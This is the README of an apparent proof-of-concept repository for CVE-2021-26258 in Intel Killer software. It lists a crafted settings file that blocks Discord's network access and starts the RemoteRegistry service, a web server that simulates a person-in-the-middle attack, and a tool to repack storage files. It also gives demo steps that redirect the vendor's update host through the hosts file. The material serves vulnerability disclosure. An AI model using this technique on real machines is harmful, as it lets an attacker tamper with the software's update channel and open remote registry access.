This repo contains tools and supplementary files for CVE-2021-26258 PoC. See the blogpost for details of the vuln.
List of files:
- rn.stg.original: original .stg file that comes with Intel Killer
- rn.xml.original: .xml file extracted from rn.stg.original by using rnstg-tool
- rn_custom.xml: custom .xml file that disables network access for Discord.exe and starts RemoteRegistry service
- rn_custom.stg: custom .stg file derived from rn_custom.xml by using rnstg-tool
- WebSrv.py: tiny web server written in Python3 for simulation of person-in-the-middle attack. The server just replies all HTTP requests with rn_custom.stg file located in the same directory as the server
- rnstg-tool: source files of the tool for packing and unpacking Killer storage files. The tool has two commands: "unpack" command extracts rn.xml stream of the input file pased as first argument, decrypts it and stores the decrypted XML to the output file which is second argument of the command. Similarly, "unpack" command takes XML file as input, encrypts it and stores the ecnrypted content to the .stg file passed as the second argument. The storage file then can be fed to Killer via its update mechanism. The tool is pretty simplistic, it doesn't verify input and output files, so do not confuse commands and their arguments!
To run the demo add the following line to .hosts file "127.0.0.1 www.killernetworking.com", put rn_custom.stg to the same directory as WebSrv.py and run the script. Next, go to Killer UI, navigate to Settings tab and click "Download Latest App Priorities" button. For details of environment setup and video of the attack refer to Demo section of the blogpost. Feel free to ask questions in Twitter